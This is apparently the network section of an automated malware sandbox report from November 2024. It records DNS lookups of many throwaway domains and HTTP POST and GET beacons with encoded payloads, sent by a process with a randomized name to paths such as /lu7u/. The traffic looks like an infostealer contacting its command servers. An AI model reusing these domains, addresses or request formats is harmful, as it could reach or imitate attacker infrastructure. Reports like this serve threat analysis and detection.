                                                                  Nov 18, 2024 13:14:41.443310976 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.443470001 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:41.443470955 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:41.479274988 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:41.484229088 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:47.566432953 CET5317780192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:47.571290016 CET805317720.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:47.571377039 CET5317780192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:47.588737011 CET5317780192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:47.594852924 CET805317720.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:48.539200068 CET805317720.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:48.594377041 CET5317780192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:48.712409973 CET805317720.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:48.712469101 CET5317780192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:49.094593048 CET5317780192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:50.114340067 CET5317880192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:50.119262934 CET805317820.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:50.119369030 CET5317880192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:50.135369062 CET5317880192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:50.140549898 CET805317820.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:51.087090015 CET805317820.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:51.141237020 CET5317880192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:51.270575047 CET805317820.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:51.270694017 CET5317880192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:51.641465902 CET5317880192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:52.660985947 CET5317980192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:52.665791988 CET805317920.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:52.665941000 CET5317980192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:52.689707994 CET5317980192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:52.694529057 CET805317920.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:52.694641113 CET805317920.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:53.614986897 CET805317920.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:53.656857014 CET5317980192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:53.794075012 CET805317920.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:53.794166088 CET5317980192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:54.206581116 CET5317980192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:55.223345041 CET5318080192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:55.228281975 CET805318020.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:55.228373051 CET5318080192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:55.238636017 CET5318080192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:55.243562937 CET805318020.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:56.188889027 CET805318020.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:56.235003948 CET5318080192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:56.369296074 CET805318020.2.36.112192.168.2.7
                                                                  Nov 18, 2024 13:14:56.369416952 CET5318080192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:56.370619059 CET5318080192.168.2.720.2.36.112
                                                                  Nov 18, 2024 13:14:56.375508070 CET805318020.2.36.112192.168.2.7

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 18, 2024 13:12:29.038666010 CET5354314162.159.36.2192.168.2.7
                                                                  Nov 18, 2024 13:12:29.703105927 CET5179753192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:12:29.710988045 CET53517971.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:12:46.355175018 CET6143453192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:12:46.398941994 CET53614341.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:12:51.412318945 CET5115153192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:12:52.408298969 CET53511511.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:13:08.691484928 CET6137153192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:13:08.738291025 CET53613711.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:13:22.142508030 CET6233853192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:13:22.166404963 CET53623381.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:13:36.662897110 CET6304153192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:13:36.702223063 CET53630411.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:13:50.066555977 CET6093453192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:13:50.549628019 CET53609341.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:14:04.113531113 CET5333653192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:14:04.154090881 CET53533361.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:14:18.207160950 CET6169153192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:14:18.274432898 CET53616911.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:14:32.203596115 CET5808053192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:14:32.911565065 CET53580801.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:14:46.488929033 CET5249153192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:14:47.500874043 CET5249153192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:14:47.563998938 CET53524911.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:14:47.564030886 CET53524911.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:15:02.144870043 CET5584553192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:15:03.156964064 CET5584553192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:15:04.172602892 CET5584553192.168.2.71.1.1.1
                                                                  Nov 18, 2024 13:15:04.334398985 CET53558451.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:15:04.334430933 CET53558451.1.1.1192.168.2.7
                                                                  Nov 18, 2024 13:15:04.334440947 CET53558451.1.1.1192.168.2.7

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 18, 2024 13:12:29.703105927 CET192.168.2.71.1.1.10x2ec7Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                  Nov 18, 2024 13:12:46.355175018 CET192.168.2.71.1.1.10x150eStandard query (0)www.uynline.shopA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:12:51.412318945 CET192.168.2.71.1.1.10xc511Standard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:08.691484928 CET192.168.2.71.1.1.10xbee3Standard query (0)www.egyshare.xyzA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:22.142508030 CET192.168.2.71.1.1.10x4caeStandard query (0)www.bionanosolutions.infoA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:36.662897110 CET192.168.2.71.1.1.10xd3eaStandard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:50.066555977 CET192.168.2.71.1.1.10x4f74Standard query (0)www.cssa.auctionA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:04.113531113 CET192.168.2.71.1.1.10x235aStandard query (0)www.acc888ommodate.xyzA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:18.207160950 CET192.168.2.71.1.1.10x3c1aStandard query (0)www.070002018.xyzA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:32.203596115 CET192.168.2.71.1.1.10x9194Standard query (0)www.startvin.topA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:46.488929033 CET192.168.2.71.1.1.10xf635Standard query (0)www.mdpc7.topA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:47.500874043 CET192.168.2.71.1.1.10xf635Standard query (0)www.mdpc7.topA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:15:02.144870043 CET192.168.2.71.1.1.10x4b25Standard query (0)www.phoenix88.sbsA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:15:03.156964064 CET192.168.2.71.1.1.10x4b25Standard query (0)www.phoenix88.sbsA (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:15:04.172602892 CET192.168.2.71.1.1.10x4b25Standard query (0)www.phoenix88.sbsA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 18, 2024 13:12:29.710988045 CET1.1.1.1192.168.2.70x2ec7Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                  Nov 18, 2024 13:12:46.398941994 CET1.1.1.1192.168.2.70x150eNo error (0)www.uynline.shopuynline.shopCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 18, 2024 13:12:52.408298969 CET1.1.1.1192.168.2.70xc511No error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:08.738291025 CET1.1.1.1192.168.2.70xbee3No error (0)www.egyshare.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:08.738291025 CET1.1.1.1192.168.2.70xbee3No error (0)www.egyshare.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:22.166404963 CET1.1.1.1192.168.2.70x4caeNo error (0)www.bionanosolutions.info176.117.73.104A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:36.702223063 CET1.1.1.1192.168.2.70xd3eaNo error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:36.702223063 CET1.1.1.1192.168.2.70xd3eaNo error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:50.549628019 CET1.1.1.1192.168.2.70x4f74No error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 18, 2024 13:13:50.549628019 CET1.1.1.1192.168.2.70x4f74No error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:04.154090881 CET1.1.1.1192.168.2.70x235aNo error (0)www.acc888ommodate.xyz176.32.38.130A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:18.274432898 CET1.1.1.1192.168.2.70x3c1aNo error (0)www.070002018.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:32.911565065 CET1.1.1.1192.168.2.70x9194No error (0)www.startvin.top203.161.46.205A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:47.563998938 CET1.1.1.1192.168.2.70xf635No error (0)www.mdpc7.topmmd.dnsmmd.comCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:47.563998938 CET1.1.1.1192.168.2.70xf635No error (0)mmd.dnsmmd.com20.2.36.112A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:47.563998938 CET1.1.1.1192.168.2.70xf635No error (0)mmd.dnsmmd.com20.2.113.172A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:47.564030886 CET1.1.1.1192.168.2.70xf635No error (0)www.mdpc7.topmmd.dnsmmd.comCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:47.564030886 CET1.1.1.1192.168.2.70xf635No error (0)mmd.dnsmmd.com20.2.36.112A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:14:47.564030886 CET1.1.1.1192.168.2.70xf635No error (0)mmd.dnsmmd.com20.2.113.172A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:15:04.334398985 CET1.1.1.1192.168.2.70x4b25No error (0)www.phoenix88.sbsphoenix88.sbsCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 18, 2024 13:15:04.334398985 CET1.1.1.1192.168.2.70x4b25No error (0)phoenix88.sbs88.99.61.52A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:15:04.334430933 CET1.1.1.1192.168.2.70x4b25No error (0)www.phoenix88.sbsphoenix88.sbsCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 18, 2024 13:15:04.334430933 CET1.1.1.1192.168.2.70x4b25No error (0)phoenix88.sbs88.99.61.52A (IP address)IN (0x0001)false
                                                                  Nov 18, 2024 13:15:04.334440947 CET1.1.1.1192.168.2.70x4b25No error (0)www.phoenix88.sbsphoenix88.sbsCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 18, 2024 13:15:04.334440947 CET1.1.1.1192.168.2.70x4b25No error (0)phoenix88.sbs88.99.61.52A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • www.ytsd88.top
                                                                  • www.egyshare.xyz
                                                                  • www.bionanosolutions.info
                                                                  • www.tals.xyz
                                                                  • www.cssa.auction
                                                                  • www.acc888ommodate.xyz
                                                                  • www.070002018.xyz
                                                                  • www.startvin.top
                                                                  • www.mdpc7.top

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.75311547.76.213.197803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:12:52.512556076 CET539OUTGET /yysf/?0PIXBf9=6v+kdCMiu5/5470MX9lzQyj8/+WeB1VHD3zgv43+rVSd7gkLKIFyovo7JjBoxgRqvXZx1v1SEu244MoSpwzCrGiBlqOxipli+BYTnOI67OOyvHeuq/FHXkVErKkJ9HuzEweZBdUTs+cq&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.ytsd88.top
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:12:53.441814899 CET574INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:12:53 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 409
                                                                  Connection: close
                                                                  ETag: "66d016cf-199"
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                  Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.75314913.248.169.48803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:08.760742903 CET804OUTPOST /lu7u/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.egyshare.xyz
                                                                  Origin: http://www.egyshare.xyz
                                                                  Referer: http://www.egyshare.xyz/lu7u/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 2f 62 37 47 67 69 4f 63 6b 36 53 4b 38 44 42 71 56 76 50 36 70 79 5a 48 67 53 46 61 51 78 6a 48 79 64 37 78 70 47 50 68 4a 7a 52 51 36 67 31 79 52 4a 4b 62 50 76 50 62 4d 64 33 44 38 4f 66 68 4d 62 36 2b 4d 42 66 47 31 51 4a 69 6a 43 4d 33 7a 67 38 48 55 48 6a 37 63 48 45 78 49 7a 45 6d 79 45 34 77 74 71 55 47 57 50 47 38 67 4a 57 31 4f 5a 43 2f 66 77 50 35 49 4f 67 5a 56 70 62 4a 58 47 77 4f 31 45 59 2f 51 7a 4c 6e 77 62 7a 58 6f 34 57 4f 77 4b 70 54 71 72 48 4f 57 39 63 72 72 33 37 73 65 37 45 2b 6f 6a 75 4a 30 6c 4d 39 70 33 49 46 4c 4e 61 35 70 61 6e 56 4a 50 57 35 35 75 41 6f 76 35 4b 55 69 79 6f 56 4f 54 4c 78 38 77 3d 3d
                                                                  Data Ascii: 0PIXBf9=/b7GgiOck6SK8DBqVvP6pyZHgSFaQxjHyd7xpGPhJzRQ6g1yRJKbPvPbMd3D8OfhMb6+MBfG1QJijCM3zg8HUHj7cHExIzEmyE4wtqUGWPG8gJW1OZC/fwP5IOgZVpbJXGwO1EY/QzLnwbzXo4WOwKpTqrHOW9crr37se7E+ojuJ0lM9p3IFLNa5panVJPW55uAov5KUiyoVOTLx8w==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.75315013.248.169.48803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:11.312334061 CET824OUTPOST /lu7u/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.egyshare.xyz
                                                                  Origin: http://www.egyshare.xyz
                                                                  Referer: http://www.egyshare.xyz/lu7u/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 2f 62 37 47 67 69 4f 63 6b 36 53 4b 74 52 56 71 4f 4e 6e 36 76 53 5a 45 73 79 46 61 5a 52 6a 44 79 64 6e 78 70 43 2f 78 4a 46 68 51 37 45 35 79 51 4e 65 62 49 76 50 62 48 39 33 4b 78 75 65 6a 4d 62 33 4c 4d 41 6a 47 31 51 4e 69 6a 41 55 33 7a 52 38 45 53 58 6a 39 56 6e 45 7a 4c 44 45 6d 79 45 34 77 74 71 6f 73 57 50 65 38 67 35 6d 31 4e 38 2b 2b 45 51 50 36 65 2b 67 5a 52 70 62 33 58 47 77 34 31 41 41 5a 51 78 6a 6e 77 65 58 58 70 70 57 42 2b 4b 70 52 6e 4c 47 4a 53 49 70 37 72 56 48 50 58 62 51 62 77 54 75 5a 31 54 4e 66 7a 56 45 70 56 63 69 43 74 59 44 6a 65 70 4c 4d 37 76 45 77 69 62 2b 31 39 46 4e 2f 44 42 71 31 71 4e 66 72 48 48 33 61 31 30 70 68 7a 4a 58 4d 47 53 4b 63 37 69 73 3d
                                                                  Data Ascii: 0PIXBf9=/b7GgiOck6SKtRVqONn6vSZEsyFaZRjDydnxpC/xJFhQ7E5yQNebIvPbH93KxuejMb3LMAjG1QNijAU3zR8ESXj9VnEzLDEmyE4wtqosWPe8g5m1N8++EQP6e+gZRpb3XGw41AAZQxjnweXXppWB+KpRnLGJSIp7rVHPXbQbwTuZ1TNfzVEpVciCtYDjepLM7vEwib+19FN/DBq1qNfrHH3a10phzJXMGSKc7is=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.75315113.248.169.48803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:13.867085934 CET1837OUTPOST /lu7u/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.egyshare.xyz
                                                                  Origin: http://www.egyshare.xyz
                                                                  Referer: http://www.egyshare.xyz/lu7u/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 2f 62 37 47 67 69 4f 63 6b 36 53 4b 74 52 56 71 4f 4e 6e 36 76 53 5a 45 73 79 46 61 5a 52 6a 44 79 64 6e 78 70 43 2f 78 4a 47 42 51 36 78 6c 79 51 71 69 62 4a 76 50 62 63 64 33 48 78 75 65 69 4d 62 66 50 4d 41 75 6b 31 53 46 69 69 6c 49 33 31 6c 67 45 62 58 6a 39 58 6e 45 32 49 7a 46 6b 79 45 70 37 74 72 45 73 57 50 65 38 67 2f 4b 31 61 35 43 2b 44 67 50 35 49 4f 67 76 56 70 62 4d 58 43 6b 6f 31 41 55 76 51 68 44 6e 77 2b 48 58 72 61 2b 42 68 36 70 50 70 72 47 72 53 49 73 68 72 56 72 44 58 59 4d 39 77 55 69 5a 34 6b 34 6c 71 45 77 7a 52 66 4c 65 72 59 6e 6d 51 4c 6e 45 31 74 55 58 6b 34 6d 58 36 58 39 48 50 6a 4f 72 38 71 71 57 66 57 76 79 77 47 63 35 2b 65 4f 70 64 48 65 34 67 47 43 50 6d 33 4a 51 6b 54 4d 79 77 74 50 68 55 41 30 6a 49 36 37 74 44 56 78 75 45 6c 5a 6d 75 2b 50 4a 69 31 72 50 51 4b 42 72 56 47 77 72 68 57 56 6f 56 35 6b 61 78 76 6f 41 37 5a 78 5a 30 74 55 53 37 39 32 6c 4c 63 63 49 2f 77 6f 69 70 51 51 71 75 50 7a 51 6c 47 52 4c 6c 71 62 7a 32 34 67 38 37 71 [TRUNCATED]
                                                                  Data Ascii: 0PIXBf9=/b7GgiOck6SKtRVqONn6vSZEsyFaZRjDydnxpC/xJGBQ6xlyQqibJvPbcd3HxueiMbfPMAuk1SFiilI31lgEbXj9XnE2IzFkyEp7trEsWPe8g/K1a5C+DgP5IOgvVpbMXCko1AUvQhDnw+HXra+Bh6pPprGrSIshrVrDXYM9wUiZ4k4lqEwzRfLerYnmQLnE1tUXk4mX6X9HPjOr8qqWfWvywGc5+eOpdHe4gGCPm3JQkTMywtPhUA0jI67tDVxuElZmu+PJi1rPQKBrVGwrhWVoV5kaxvoA7ZxZ0tUS792lLccI/woipQQquPzQlGRLlqbz24g87qVohv43WTOD/8nkb2HHr3cy40n5S/Pmu4C7DgnrtjGj+DHkXGJfQaTJHXJoegGI1AKx/iXhgxs7ryGZIDVSQgkunDjYEy78PqyItxNYXl6iQMmSemI5kG3iMKxt+iBfIYlRLJe3+ypSN0E4zPD8Iy+6gw2CCduggZ5MUwV8g8YjowofcZ2sQ20pA/ouXfbDeYbqOE4uXdianRXFxfxa0HA3kByaicYGQZFRhkwhpMmWMPnBiZPJTfO/GGs+aUY0a1QmKnlNoUalFx+GLU/jo7Zw5fVbHSPFZK57niSaCVg2IGpENpsUk+en6tfT2vOB/YDX4mSl7+BQr8M56pIAVNR2TsqKVohvxeRLIiD6veynhu8VGkpZk5qRhf/9FvRqOr0TXsENkO6kwL2awrlVGou6aaIjzdg0iPkcrWXnXRM5jwEu+pIEaU17iOoyGLBMWaBGJyUBjS4PMSXItk1gsKjOHDqSyyXfiDaT79zbtnkqFbsg21dIQ9FzRaMf3B3u7s1exEOakgFaLXuwo56ii4cY4Wj0H9AI8byyuqxHau+a3ldYKPyLxQ1eeVVdzp1yRGXHqqp5N3JaONRMiQ2hpxqIwjV/p4M3KYyQYoZtZPgMpmgXRNCsm7LLv0TKZMC3KyV2Wpzw6HVMj0CgXPQ3U+dzky5g3867Z6OZ [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.75315213.248.169.48803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:16.408215046 CET541OUTGET /lu7u/?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2ze HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.egyshare.xyz
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:13:17.060798883 CET416INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Mon, 18 Nov 2024 12:13:16 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 276
                                                                  Connection: close
